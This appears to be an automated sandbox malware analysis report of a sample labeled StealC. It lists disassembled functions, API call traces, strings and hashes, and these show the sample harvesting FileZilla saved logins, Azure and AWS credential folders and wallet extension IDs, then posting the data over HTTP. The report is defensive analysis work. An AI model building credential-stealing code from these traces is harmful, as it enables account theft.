String ID: Db2luOTggV2FsbGV0fGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbGV0fGNnZWVvZHBmYWdqY2VlZmllZmxtZGZwaHBsa2VubGZrfDF8MHwwfEthcmRpYUNoYWluIFdhbGxldHxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXxhY21hY29ka2piZGdtb2xlZWJvbG1kam9uaWx
API String ID: 928082926-3339970061
Opcode ID: 9a59193d3eec41abc7d3469c61545a7ca1cc18b3361031207247b46b836b5c36
Instruction ID: dd3c3a3d26858843429f6d5decb7cafffae2eba94575410ce68dee667d1b0b48
Opcode Fuzzy Hash: 9a59193d3eec41abc7d3469c61545a7ca1cc18b3361031207247b46b836b5c36
Instruction Fuzzy Hash: 083210B2D14314ABCB55EBA0DC89DEA737CBB44710F444A98F21D62090EE78EB85DF52

Function 00780250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 007799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007799EC
Part of subcall function 007799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00779A11
Part of subcall function 007799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00779A31
Part of subcall function 007799C0: ReadFile.KERNEL32(000000FF,?,00000000,007802E7,00000000), ref: 00779A5A
Part of subcall function 007799C0: LocalFree.KERNEL32(007802E7), ref: 00779A90
Part of subcall function 007799C0: CloseHandle.KERNEL32(000000FF), ref: 00779A9A

Part of subcall function 00788E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00788E52

strtok_s.MSVCRT ref: 0078031B
GetProcessHeap.KERNEL32(00000000,000F423F,00790DBA,00790DB7,00790DB6,00790DB3), ref: 00780362
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00790DB2), ref: 00780369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00780385
lstrlenA.KERNEL32(00000000), ref: 00780393

Part of subcall function 007888E0: malloc.MSVCRT ref: 007888E8
Part of subcall function 007888E0: strncpy.MSVCRT ref: 00788903

StrStrA.SHLWAPI(00000000,<Port>), ref: 007803CF
lstrlenA.KERNEL32(00000000), ref: 007803DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00780419
lstrlenA.KERNEL32(00000000), ref: 00780427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00780463
lstrlenA.KERNEL32(00000000), ref: 00780475
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00790DB2), ref: 00780502
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0078051A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00780532
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0078054A
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00780562
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00780571
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00780580
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00780593
lstrcatA.KERNEL32(?,00791678,?,?,00000000), ref: 007805A2
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 007805B5
lstrcatA.KERNEL32(?,0079167C,?,?,00000000), ref: 007805C4
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 007805D3
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 007805E6
lstrcatA.KERNEL32(?,00791688,?,?,00000000), ref: 007805F5
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00780604
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00780617
lstrcatA.KERNEL32(?,00791698,?,?,00000000), ref: 00780626
lstrcatA.KERNEL32(?,0079169C,?,?,00000000), ref: 00780635
strtok_s.MSVCRT ref: 00780679
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00790DB2), ref: 0078068E
memset.MSVCRT ref: 007806DD

Strings

url: , xrefs: 00780577
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 007802A4
password: , xrefs: 007805FB
Nx, xrefs: 0078072E, 007806AF, 007806B2
Nx, xrefs: 007802CC, 007802F2, 007802CF, 007802F5
<Port>, xrefs: 007803C6
<Pass encoding="base64">, xrefs: 0078045A
<Host>, xrefs: 0078037C
login: , xrefs: 007805CA
<User>, xrefs: 00780410
browser: FileZilla, xrefs: 00780559
profile: null, xrefs: 00780568

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Nx$Nx$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-3585920888
Opcode ID: abcafcb891868addb055c13347bf9fc034edec2096869f216ae00db75e84b89c
Instruction ID: ed83a010c13507e3c3abc05717d7e617436c311060e2c91ea70b9e7f78ffecb0
Opcode Fuzzy Hash: abcafcb891868addb055c13347bf9fc034edec2096869f216ae00db75e84b89c
Instruction Fuzzy Hash: B4D10E71D50108EBDB04FBE4DD9AEEE7778AF54310F508519F102A6091EF7CAA06DB62

Function 00775100 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
Part of subcall function 007747B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
Part of subcall function 007747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849

lstrlenA.KERNEL32(00000000), ref: 00775193

Part of subcall function 00788EA0: CryptBinaryToStringA.CRYPT32(00000000,00775184,40000001,00000000,00000000,?,00775184), ref: 00788EC0

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00775207
StrCmpCA.SHLWAPI(?,00CFD998), ref: 00775225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00775340
HttpOpenRequestA.WININET(00000000,00CFD988,?,00D00ED8,00000000,00000000,00400100,00000000), ref: 007753A4

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,00D015F8,00000000,?,00CF4C08,00000000,?,007919DC,00000000,?,007851CF), ref: 00775737
lstrlenA.KERNEL32(00000000), ref: 0077574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0077575C
HeapAlloc.KERNEL32(00000000), ref: 00775763
lstrlenA.KERNEL32(00000000), ref: 00775778
memcpy.MSVCRT(?,00000000,00000000), ref: 0077578F
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 007757A9
memcpy.MSVCRT(?), ref: 007757B6
lstrlenA.KERNEL32(00000000), ref: 007757C8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 007757E1
memcpy.MSVCRT(?), ref: 007757F1
lstrlenA.KERNEL32(00000000,?,?), ref: 0077580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00775822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0077584D
InternetCloseHandle.WININET(00000000), ref: 007758B1
InternetCloseHandle.WININET(00000000), ref: 007758BE
InternetCloseHandle.WININET(00000000), ref: 007758C8

Strings

", xrefs: 00775482
------, xrefs: 00775297
--, xrefs: 00775280
", xrefs: 00775706
------, xrefs: 0077563B
", xrefs: 007755C4
------, xrefs: 007754F9
------, xrefs: 007753B7

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 2744873387-2774362122
Opcode ID: 0c49f622086a6954a1177a7c83f4db6ae1138c3b7055a12bea8cf84b547016d3
Instruction ID: 30db076a46ac034a8d968523112756a524e1b96cdcb1e94d295ec0b9f375c25d
Opcode Fuzzy Hash: 0c49f622086a6954a1177a7c83f4db6ae1138c3b7055a12bea8cf84b547016d3
Instruction Fuzzy Hash: 8832DB71960118FAEB15FBA0DC99FEE7378BF54700F5041AAB10662091EF7C6A49CF62

Function 00775960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
Part of subcall function 007747B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
Part of subcall function 007747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007759F8
StrCmpCA.SHLWAPI(?,00CFD998), ref: 00775A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00775B93
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00D01688,00000000,?,00CF4C08,00000000,?,00791A1C), ref: 00775E71
lstrlenA.KERNEL32(00000000), ref: 00775E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00775E93
HeapAlloc.KERNEL32(00000000), ref: 00775E9A
lstrlenA.KERNEL32(00000000), ref: 00775EAF
memcpy.MSVCRT(?,00000000,00000000), ref: 00775EC6
lstrlenA.KERNEL32(00000000), ref: 00775ED8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00775EF1
memcpy.MSVCRT(?), ref: 00775EFE
lstrlenA.KERNEL32(00000000,?,?), ref: 00775F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00775F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00775F4C
InternetCloseHandle.WININET(00000000), ref: 00775FB0
InternetCloseHandle.WININET(00000000), ref: 00775FBD
HttpOpenRequestA.WININET(00000000,00CFD988,?,00D00ED8,00000000,00000000,00400100,00000000), ref: 00775BF8

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

InternetCloseHandle.WININET(00000000), ref: 00775FC7

Strings

", xrefs: 00775E16
------, xrefs: 00775A96
------, xrefs: 00775C0B
------, xrefs: 00775D4C
", xrefs: 00775CD5

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 1406981993-2180234286
Opcode ID: 85ecaf5b1e030df50feb8768281fcd457c116644957ae7d407d2bbf6c32384a7
Instruction ID: c06cb1d14fd69a35940779912b8207cd8f3694f2fc089be38d0c023aa7d7db7b
Opcode Fuzzy Hash: 85ecaf5b1e030df50feb8768281fcd457c116644957ae7d407d2bbf6c32384a7
Instruction Fuzzy Hash: 5B12CF71864118FAEB15FBA0DC99FEE7378BF14700F5041AAF10662091EF787A49CB66

Function 0077A790 Relevance: 40.8, APIs: 22, Strings: 1, Instructions: 538
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0078AA70: StrCmpCA.SHLWAPI(00000000,00791470,0077D1A2,00791470,00000000), ref: 0078AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0077AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0077AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0077ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0077A8B0

Part of subcall function 0078A820: lstrlenA.KERNEL32(00000000,?,?,00785B54,00790ADB,00790ADA,?,?,00786B16,00000000,?,00CF1620,?,0079110C,?,00000000), ref: 0078A82B
Part of subcall function 0078A820: lstrcpy.KERNEL32(y,00000000), ref: 0078A885

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

lstrcatA.KERNEL32(?,00000000,00000000,00CFD8C8,00791318,00CFD8C8,00791314), ref: 0077ACEB
lstrcatA.KERNEL32(?,00791320), ref: 0077ACFA
lstrcatA.KERNEL32(?,00000000), ref: 0077AD0D
lstrcatA.KERNEL32(?,00791324), ref: 0077AD1C
lstrcatA.KERNEL32(?,00000000), ref: 0077AD2F
lstrcatA.KERNEL32(?,00791328), ref: 0077AD3E
lstrcatA.KERNEL32(?,00000000), ref: 0077AD51
lstrcatA.KERNEL32(?,0079132C), ref: 0077AD60
lstrcatA.KERNEL32(?,00000000), ref: 0077AD73
lstrcatA.KERNEL32(?,00791330), ref: 0077AD82
lstrcatA.KERNEL32(?,00000000), ref: 0077AD95
lstrcatA.KERNEL32(?,00791334), ref: 0077ADA4
lstrcatA.KERNEL32(?,00000000), ref: 0077ADB7
lstrlenA.KERNEL32(?), ref: 0077AE0D
lstrlenA.KERNEL32(?), ref: 0077AE1C
memset.MSVCRT ref: 0077AE6B

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 00779E10: memcmp.MSVCRT(?,v20,00000003), ref: 00779E2D

DeleteFileA.KERNEL32(00000000), ref: 0077AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0077ABD4

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessmemcmpmemset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4068497927-2709115261
Opcode ID: 46e990367b883ae2d58f96833a8fd6765e3f5224b70f2a468715f90fefaecf68
Instruction ID: 6d12f0ef0ad83516125157652fba3a0c237fed850dae2500f93a65fd7ba26011
Opcode Fuzzy Hash: 46e990367b883ae2d58f96833a8fd6765e3f5224b70f2a468715f90fefaecf68
Instruction Fuzzy Hash: 6912ED71950108FBEB09FBA0DD9AEEE7378AF54301F504169F506A6091DE3C6E0ADB72

Function 00784D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00784D87

Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B

lstrcatA.KERNEL32(?,00000000), ref: 00784DB0
lstrcatA.KERNEL32(?,\.azure\), ref: 00784DCD

Part of subcall function 00784910: wsprintfA.USER32 ref: 0078492C
Part of subcall function 00784910: FindFirstFileA.KERNEL32(?,?), ref: 00784943

memset.MSVCRT ref: 00784E13
lstrcatA.KERNEL32(?,00000000), ref: 00784E3C
lstrcatA.KERNEL32(?,\.aws\), ref: 00784E59

Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FDC), ref: 00784971
Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FE0), ref: 00784987
Part of subcall function 00784910: FindNextFileA.KERNEL32(000000FF,?), ref: 00784B7D
Part of subcall function 00784910: FindClose.KERNEL32(000000FF), ref: 00784B92

memset.MSVCRT ref: 00784E9F
lstrcatA.KERNEL32(?,00000000), ref: 00784EC8
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00784EE5

Part of subcall function 00784910: wsprintfA.USER32 ref: 007849B0
Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,007908D2), ref: 007849C5
Part of subcall function 00784910: wsprintfA.USER32 ref: 007849E2
Part of subcall function 00784910: PathMatchSpecA.SHLWAPI(?,?), ref: 00784A1E
Part of subcall function 00784910: lstrcatA.KERNEL32(?,00CFD8E8,?,000003E8), ref: 00784A4A
Part of subcall function 00784910: lstrcatA.KERNEL32(?,00790FF8), ref: 00784A5C
Part of subcall function 00784910: lstrcatA.KERNEL32(?,?), ref: 00784A70
Part of subcall function 00784910: lstrcatA.KERNEL32(?,00790FFC), ref: 00784A82
Part of subcall function 00784910: lstrcatA.KERNEL32(?,?), ref: 00784A96
Part of subcall function 00784910: CopyFileA.KERNEL32(?,?,00000001), ref: 00784AAC
Part of subcall function 00784910: DeleteFileA.KERNEL32(?), ref: 00784B31

memset.MSVCRT ref: 00784F2B

Strings

Azure\.azure, xrefs: 00784DD3
Azure\.IdentityService, xrefs: 00784EEB
*.*, xrefs: 00784DD8
*.*, xrefs: 00784E64
msal.cache, xrefs: 00784EF0
zax, xrefs: 00784DF1, 00784E7D, 00784F09, 00784F34, 00784DF4, 00784E80, 00784F0C
\.azure\, xrefs: 00784DC1
\.IdentityService\, xrefs: 00784ED9
Azure\.aws, xrefs: 00784E5F
\.aws\, xrefs: 00784E4D

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
